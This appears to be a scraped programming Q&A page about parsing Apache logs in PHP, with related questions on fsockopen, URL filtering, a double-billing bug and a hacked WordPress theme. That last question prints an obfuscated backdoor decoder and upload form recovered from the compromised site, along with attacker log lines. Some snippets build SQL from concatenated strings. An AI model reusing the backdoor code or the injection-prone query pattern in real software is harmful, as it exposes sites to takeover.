Parsing raw apache logs - php

I need some php code for parsing raw apache logs.
In particular, I want the number of times mode=search and the term used for searching. Here is an example:
207.46.195.228 - - [30/Apr/2010:03:24:26 -0700] "GET /index.php?mode=search&term=AE1008787E0174 HTTP/1.1" 200 13047 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.81.200.167 - - [30/Apr/2010:04:21:43 -0700] "GET /index.php?mode=search&term=WH2002D-YYH HTTP/1.1" 200 12079 "http://www.mysite.com/SearchGBY.php?page=81" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; WinuE v6)"
212.81.200.167 - - [30/Apr/2010:04:21:44 -0700] "GET /file_uploads/banners/banner.swf HTTP/1.1" 200 50487 "-" "contype"
66.249.68.168 - - [30/Apr/2010:04:21:45 -0700] "GET /index.php?mode=search&term=WH2002D-YYH HTTP/1.1" 200 12079 "-" "Mediapartners-Google"

I recently wrote a very crude parser for this:
$ignore = array('css', 'png', 'gif', 'jpg', 'jpeg', 'js', 'ico');
$f = fopen('access_log', "r");
if(!$f) die("Failed to open log for reading.");
while (!feof($f)) {
$buff = fgets($f, 4096);
$parts = explode(' ', $buff);
if(in_array(end(explode('.', $parts[6])), $ignore)) continue;
$domain = trim(end($parts));
// http method
$http_method = substr($parts[5], 1);
if($http_method != 'GET' && $http_method != 'POST') continue;
// parse out the date
list($d, $m, $y) = explode('/', substr($parts[3], 1));
$y = substr($y, 0, 4);
$time = strtotime("{$d} {$m} {$y}");
print "{$time} {$parts[0]} {$http_method} {$parts[6]} $domain\n";
}
$parts[6] should contain the part you're interested in (the resource that was accessed). This should get you on your way...

As easy as using regular expressions: http://php.net/manual/en/book.regex.php

Related

Why doesnt work the fsockopen if my server called the file?

I need little help..
We have a test code which use fsockopen. Code:
<?php
//require_once "../common.php";
$url = "https://xxxxx/xxxx/fsockopen_called_file.php";
$close = true;
echo "<pre>";
error_log("\n\n");
trigger_error("1. fsockopen url meghivasa: ".$url);
$result = call_url($url, $close);
trigger_error("2. eredmény: ".var_export($result, true)."\n\n");
function call_url($url, $close = TRUE) {
$user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36";
$parts = parse_url($url);
if (#$parts["scheme"] === "https" && (!#$parts["port"] || $parts["port"] == 80)) {
$parts["port"] = 443;
$parts["scheme"] = "ssl";
}
$out = "GET ".$parts["path"]." HTTP/1.1\r\n";
$out.= "Host: ".$parts["host"]."\r\n";
$out.= "User-Agent: ".$user_agent."\r\n";
$out.= "Content-Length: 0\r\n";
if ($close) { $out.= "Connection: Close\r\n"; }
$out.= "\r\n";
$fsock_url = ($parts["scheme"] !== "http"? ($parts["scheme"]."://") : "").$parts["host"];
$fp = fsockopen($fsock_url, isset($parts["port"])? $parts["port"] : 80, $errno, $errstr, 30);
fwrite($fp, $out);
$result = "";
//Ha a kapcsolatot lezárjuk, akkor nem várjuk meg a választ.
if (!$close) {
while (!feof($fp)) {
$result .= fgets($fp, 128);
}
}
fclose($fp);
if (is_bool($fp) && !$fp && !$errno) {
//Az fsockopen false értékkel tért vissza, és nincs az errno változóban hibakód.
$errno = 1;
$errstr = "Nem lehetett a szerverhez kapcsolódni: ".$url." => ".$fsock_url;
}
return ["errno" => $errno, "errstr" => $errstr, "result" => $result];
}
My problem is that the file(fsockopen_called_file.php) that the code calls does not appear in the access log.
accesslog:
x.x.x.x - [19/Jun/2022:20:20:32 +0200] "GET /xxx/fsockopen.php HTTP/1.1" 200 4890 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
Thats it. fsockopen_called_file.php file doesnt apper. It's like doesnt work.
Server info:
Ubuntu 20.04
Apache 2.4.54-1+ubuntu20.04.1+deb.sury.org+1
Php7.4 1:7.4.30-1+ubuntu20.04.1+deb.sury.org+1
I tried this options:
-firewall off
-I build same server same options and its worked
Does anyone have any ideas that can help me?
Thanks,
Balee

Log parser - extend

I have icecast access log Like this:
11.11.111.11 - 5229 [08/May/2018:11:43:38 +0200] "GET /chillout_delicate.ogg HTTP/1.1" 200 36256 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9300 Build/JSS15J)" 0
111.111.11.111 - 2510/14 [08/May/2018:11:43:39 +0200] "GET /pub3.ogg HTTP/1.1" 200 36467 "-" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-P5200 Build/KOT49H)" 1
First value is IP. Second one, after -, is user name. Usually it's a number like 2510/14 or 234. I found php file which I try customize.
<?php
$ac_arr = file('/var/log/icecast2/access.log');
$astring = join("", $ac_arr);
$astring = preg_replace("/(\n|\r|\t)/", "", $astring);
$records = preg_split("/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/", $astring, -1, PREG_SPLIT_DELIM_CAPTURE);
$sizerecs = sizeof($records);
// now split into records
$i = 1;
$each_rec = 0;
while($i<$sizerecs) {
$ip = $records[$i];
$all = $records[$i+1];
// parse other fields
preg_match("/\[(.+)\]/", $all, $match);
$access_time = $match[1];
$all = str_replace($match[1], "", $all);
preg_match("/\"[A-Z]{3,7} (.[^\"]+)/", $all, $match);
$http = $match[1];
$link = explode(" ", $http);
$all = str_replace("\"[A-Z]{3,7} $match[1]\"", "", $all);
preg_match("/([0-9]{3})/", $all, $match);
$success_code = $match[1];
$all = str_replace($match[1], "", $all);
preg_match("/\"(.[^\"]+)/", $all, $match);
$ref = $match[1];
$all = str_replace("\"$match[1]\"", "", $all);
preg_match("/\"(.[^\"]+)/", $all, $match);
$browser = $match[1];
$all = str_replace("\"$match[1]\"", "", $all);
preg_match("/([0-9]+\b)/", $all, $match);
$bytes = $match[1];
$all = str_replace($match[1], "", $all);
print("<br>IP: $ip<br>Access Time: $access_time<br>Page: $link[0]<br>Type: $link[1]<br>Success Code: $success_code<br>Bytes Transferred: $bytes<br>Referer: $ref <br>Browser: $browser<hr>");
// advance to next record
$i = $i + 2;
$each_rec++;
}
?>
It gives me results
IP: xxx.xxx.xx.xx
Access Time: 08/May/2018:11:58:19 +0200
Page: /restaurant.ogg
Type: HTTP/1.1
Success Code: 153
Bytes Transferred: 8
Referer: GET /restaurant.ogg HTTP/1.1
Browser: Dalvik/1.6.0 (Linux; U; Android 4.1.2; IdeaTabA1000-F Build/JZO54K)
I have little experience with regex. How can I add to this results user name? Please, help.
Try this regex:
https://regex101.com/r/ETKSr3/2
It will parse your string as I think you want in one go.
$re = '/(\d+\.\d+\.\d+\.\d+)\s-\s([\d\/]+)\s\[(.*?)\]\s\"(.*?)\s\/(.*?)\s(.*?)\"\s(\d+)\s(\d+).*?\"(\w+.*?)\"\s(\d+)/m';
$str = '11.11.111.11 - 5229 [08/May/2018:11:43:38 +0200] "GET /chillout_delicate.ogg HTTP/1.1" 200 36256 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9300 Build/JSS15J)" 0
111.111.11.111 - 2510/14 [08/May/2018:11:43:39 +0200] "GET /pub3.ogg HTTP/1.1" 200 36467 "-" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-P5200 Build/KOT49H)" 1';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);

Wordpress vulnerability issue

My wordpress website have just been hacked and after looking at logs I saw that they exploited this file: www/wp-content/themes/mytheme/style.php
When browse this link www.mywebsite.com/wp-content/themes/mytheme/style.php I find an input field with a button. So I guess that's where they uploaded their shell script.
function pre_term_name( $wp_kses_data, $wp_nonce ) {
$kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
$filter = base64_decode( $kses_str );
$md5 = strrev( $wp_nonce );
$sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
$wp_nonce = md5( $wp_nonce ). $sub;
$preparefunc = 'gzinflate';
$i = 0; do {
$ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
$filter[$i] = chr( $ord % 256 );
$wp_nonce .= $filter[$i]; $i++;
} while ($i < strlen( $filter ));
return #$preparefunc( $filter );
}
$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= ">"/></form>';
How can I solve this vulnerability? Thanks
logs:
195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
That line is where the input would be. The vulnerability would be whatever that is posting to. It appears that the action is blank and so I'd assume there is a jQuery/AJAX call that is stopping the submission and passing the data. That would be where to check. From there you will know where the data is actually being posted and a query is being executed. Check that the query is using PDO and/or the inputs are sanitized.
As a general "helper" with WP security though, I like the Sucuri WP plugin.
You can use WordPress Security Plugins for example: WordFence, BulletProof Security, Sucuri Security, iThemes Security, Acunetix WP SecurityScan
and
check this pages:threats
Security Vulnerabilities

Exclude domains from a match list in a string

I have access logs of my server which has an extension of .log and it has around 150K lines of codes which contain URLs, I want to separately output those URLs in a separate text file, each URL in a new line.
I want to exclude few URLs like http://www.google.com bot and http://www.example.com all are added in an array below and I will be adding more in a list. Domains will start with example.com but have different query strings as well in it or simple domains.
$string = '
166.137.126.16 - - [06/May/2017:02:32:33 +0530] "GET /files/adg3com_crypticpsyche2.mp3 HTTP/1.0" 200 906922 "http://paradiseconcertspresents.com/?dn=content&cn=page&sw=view&page_id=location"
66.249.92.82 - - [06/May/2017:02:32:36 +0530] "GET /wp/autotow/wp-content/uploads/sites/5/locations_bg2.jpg HTTP/1.0" 500 658 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
100.6.157.102 - - [06/May/2017:02:32:36 +0530] "GET /files/food_icon1.png HTTP/1.0" 200 3681 "http://totopomex.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"
100.6.157.102 - - [06/May/2017:02:32:36 +0530] "GET /files/food_icon3.png HTTP/1.0" 200 4028 "http://totopomex.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"
97.83.34.133 - - [06/May/2017:02:32:38 +0530] "GET /files/1920x1200.jpg HTTP/1.0" 404 416 "http://thatsapizzami.com/odds-ends/"
77.49.52.0 - - [06/May/2017:02:32:40 +0530] "GET /files/favicon.png HTTP/1.0" 200 1239 "http://radionotios.gr/"
66.175.153.111 - - [06/May/2017:02:32:45 +0530] "GET /files/pixel_weave.png HTTP/1.0" 404 416 "http://www.mississippisportsmedicine.com/"
66.249.92.82 - - [06/May/2017:02:32:46 +0530] "GET /wp/wp-content/uploads/sites/5/subheader_bg.jpg HTTP/1.0" 500 658 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
66.249.92.86 - - [06/May/2017:02:33:06 +0530] "GET /wp/autotow/wp-content/uploads/sites/5/locations_bg2.jpg HTTP/1.0" AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
216.255.37.4 - - [06/May/2017:02:33:09 +0530] "GET /files/food_icon1.png HTTP/1.0" 200 3681 "http://spenglers.com/" "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36"
141.70.4.75 - - [06/May/2017:02:33:09 +0530] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.0" 200 2251 "http://www.example.com/medical/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
141.70.4.75 - - [06/May/2017:02:34:09 +0530] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.0" 200 2251 "http://www.example.com/medical/standard-post/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
';
// Match all the strings starting with http(s) or without www
preg_match_all('((?:https?:|www\.)[^\s]+)', $string, $match);
/**
* Not exactly same domains as shown here but few may contain
* different query strings as well but the domains starting with
* domains with extension or something would be good
*/
$exlucde_domains = array(
'google' => 'http://www.google.com/adsbot.html',
'example' => 'http://www.example.com/',
'msn' => 'http://www.msn.com/adsbot.html',
'yandex' => 'http://www.yandex.com/adsbot.html',
);
// Excludes duplicate entries
$unique_match = array_unique($match[0]);
// Return each match in a new line
foreach ( $unique_match as $matchlink ){
echo $matchlink ."\n";
}
What I Want to do?
Now I want to exclude few domains as said above but I can't as I have no idea on it but I have achieved to some level of getting this done.
<?php
$string = '
166.137.126.16 - - [06/May/2017:02:32:33 +0530] "GET /files/adg3com_crypticpsyche2.mp3 HTTP/1.0" 200 906922 "http://paradiseconcertspresents.com/?dn=content&cn=page&sw=view&page_id=location"
...
';
$logEntries = explode("\n", $string);
foreach ($logEntries as $index => $logEntry) {
if (preg_match("(www\.google\.com|www\.example\.com)", $logEntry) > 0) {
unset($logEntries[$index]);
}
}
// $logEntries now contains remaining entries that do not contain the filtered out domains
foreach ($logEntries as $logEntry) {
echo $logEntry . "\n";
}
You could achieve it like:
$exclude_domains = array(
'google' => 'http://www.google.com/adsbot.html',
'example' => 'http://www.example.com/',
'msn' => 'http://www.msn.com/adsbot.html',
'yandex' => 'http://www.yandex.com/adsbot.html',
);
$regex = '~' . implode('|', array_map("preg_quote", $exclude_domains)) . '~';
// Excludes duplicate entries
$unique_match = array_unique($match[0]);
// Return each match in a new line
foreach ( $unique_match as $matchlink ){
if (!preg_match($regex, $matchlink)) {
echo "$matchlink\n";
}
}
Here, a new regex is created with the to-be-excluded-domains (using preg_quote before). In the foreach loop this is check against.
Another way would be to use negative lookaheads in the original expression.

PHP: MySQL query duplicating update for no reason

The code below is first the client code, then the class file.
For some reason the 'deductTokens()' method is calling twice, thus charging an account double.
I've been programming all night, so I may just need a second pair of eyes:
if ($action == 'place_order') {
if ($_REQUEST['unlimited'] == 200) {
$license = 'extended';
} else {
$license = 'standard';
}
if ($photograph->isValidPhotographSize($photograph_id, $_REQUEST['size_radio'])) {
$token_cost = $photograph->getTokenCost($_REQUEST['size_radio'], $_REQUEST['unlimited']);
$order = new ImageOrder($_SESSION['user']['id'], $_REQUEST['size_radio'], $license, $token_cost);
$order->saveOrder();
$order->deductTokens();
header('location: account.php');
} else {
die("Please go back and select a valid photograph size");
}
}
######CLASS CODE#######
<?php
include_once('database_classes.php');
class Order {
protected $account_id;
protected $cost;
protected $license;
public function __construct($account_id, $license, $cost) {
$this->account_id = $account_id;
$this->cost = $cost;
$this->license = $license;
}
}
class ImageOrder extends Order {
protected $size;
public function __construct($account_id, $size, $license, $cost) {
$this->size = $size;
parent::__construct($account_id, $license, $cost);
}
public function saveOrder() {
//$db = Connect::connect();
//$account_id = $db->real_escape_string($this->account_id);
//$size = $db->real_escape_string($this->size);
//$license = $db->real_escape_string($this->license);
//$cost = $db->real_escape_string($this->cost);
}
public function deductTokens() {
$db = Connect::connect();
$account_id = $db->real_escape_string($this->account_id);
$cost = $db->real_escape_string($this->cost);
$query = "UPDATE accounts set tokens=tokens-$cost WHERE id=$account_id";
$result = $db->query($query);
}
}
?>
When I die("$query"); directly after the query, it's printing the proper statement, and when I run that query within MySQL it works perfectly.
$action = $_REQUEST['action'];
account.php is just a list of orders, never does it call up downloads.php. Just tried commenting out the redirect, but I'm having the same problem. I don't understand how it's getting called twice, the die statements are showing the right query, and the script doesn't reload itself.
Here are my apache access logs:
71.*** - - [22/May/2010:13:14:35 +0000] "POST /download.php?action=confirm_download&photograph_id=122 HTTP/1.1" 200 1951 "http://***.com/viewphotograph.php?photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /download.php?action=place_order&photograph_id=122&size_radio=xsmall&unlimited=0 HTTP/1.1" 302 453 "http://*** .com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /download.php?action=place_order&photograph_id=122&size_radio=xsmall&unlimited=0 HTTP/1.1" 302 453 "http://*** .com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /account.php HTTP/1.1" 200 2626 "http://***.com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
I understand there's obviously something wrong here. But I can't figure out where the second request is coming from.
The line:
header('location: account.php');
Forwards the browser, but doesn't end the php script.
This might be fine, the code-snippet you gave doens't "do" anything after this line.
Another option might be a double-click
If you double-click on the submit button, the form will be sent twice.
We used some javascript to disable the submit button after the first click.
Another long shot, but it happened to me once in Firefox - doubled page executions, resulting in doubled inserts and updates - close your browser and restart.
I know this will sound strange but make sure that you don't have tag with empty src="" attribute or any css style refering to empty url (like background: url();) on your site around the place when you have your code that runs twice.
Read about some trouble this may cause here: http://hi.baidu.com/zhenyk/blog/item/38a1051fc63b96c3a686698f.html

Categories